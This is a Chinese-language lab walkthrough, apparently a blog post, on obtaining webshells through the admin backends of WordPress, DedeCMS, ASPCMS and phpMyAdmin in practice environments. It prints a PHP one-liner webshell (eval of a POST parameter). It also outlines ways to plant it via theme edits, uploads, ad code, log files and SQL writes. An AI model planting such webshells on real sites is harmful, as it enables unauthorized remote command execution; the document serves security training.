常见CMS获取webshell的方法-靶场练习
一.wordpress拿去webshell的两种方法
1.后台修改模板获取websehll
1.1首先我们来到我们的vulhub靶场,然后启动我们的环境。命令:
cd /vulhub-master/wordpress/ pwnscriptum/
docker-compose up -d
2.然后输入:docker ps查看端口然后去访问
3.然后我们访问一下,来到首页后会叫我们创建用户,创建完成并登录
4.登录成功后如图片中的去操作
5.然后我们去访问这个404.php文件,文件位置为:/wp-content/themes/自己模板的名称/404.php
6.尝试执行命令,成功执行命令!
2.上传主题获取webshell
1.我们先下载一个模板文件,直接去百度搜索wordpress免费模板下载即可。
2.然后我们解压压缩包,并在文件里面写入一个1.php的木马文件,木马内容为:<?php
eval($_POST[cmd]);
?>
3.写好后再将文件压缩,然后上传
4.上传成功后会给你一个地址,我们去访问一下这个文件夹下的木马文件,并尝试执行命令可以看到成功执行。
二.DEDECMS获取webshell
1.通过文件上传器获取webshell
1.首先暗安装靶场:织梦 (DedeCMS) 官方网站 - 内容管理系统 - 上海卓卓网络科技有限公司
2.然后下载后解压在我们小皮面板的网站根目录下
3.然后去访问这个网站,然后填写数据库信息注册。
4.安装好后登录后台
5.然后来到文件上传的地方。
6.准备一个1.php木马文件文件内容:<?php @eval($_POST[cmd]);?>,然后上传文件。上传文件成功后可以看到文件地址,我们去访问一下。
7.成功访问到后尝试执行命令可以看到成功执行。
2.修改文件模板获取webshell
1.然后来到模板这里修改文件
2.然后我们点击修改,修改文件然后保存并更行
然后来到这里修改
3.修改完刷新后就可以看到命令执行了。
3.后台执行任意命令
1.首先我们来到广告界面,按照图片中操作
2.然后再按照托i暗中修改广告代码
3.然后我们来到这里查看路径
4.访问成功后我们使用蚁剑连接,成功连接
三.ASPCMS获取websehll
1.首先我们安装好我们的靶场
2.然后我们如图所示可以看到这里可以修改幻灯片的配置。那我们就可以直接修改幻灯片的配置。
3.然后我们来到这个文件夹来修改文件
然后按照图片中的位置修改
4.然后我们去访问这个文件,成功访问到
5.然后我们取用木马连接工具连接木马
四.PhPMyadmin获取webshell
1.使用日志文件拿去shell
1.首先我们先安装PhPMyadmin
2.然后来到管理的网站,然后使用密码登录
3.接下来按照图片修改
5.在这里查询一句话木马,这样日志文件里面就会有这个一句话木马了。
6.去浏览器访问这个文件,然后去执行命令可以看到成功执行。
2.sql语句插入木马
1.我们输入sql插入语句
2.然后我们尝试去访问这个文件,并执行命令可以看到成功执行。
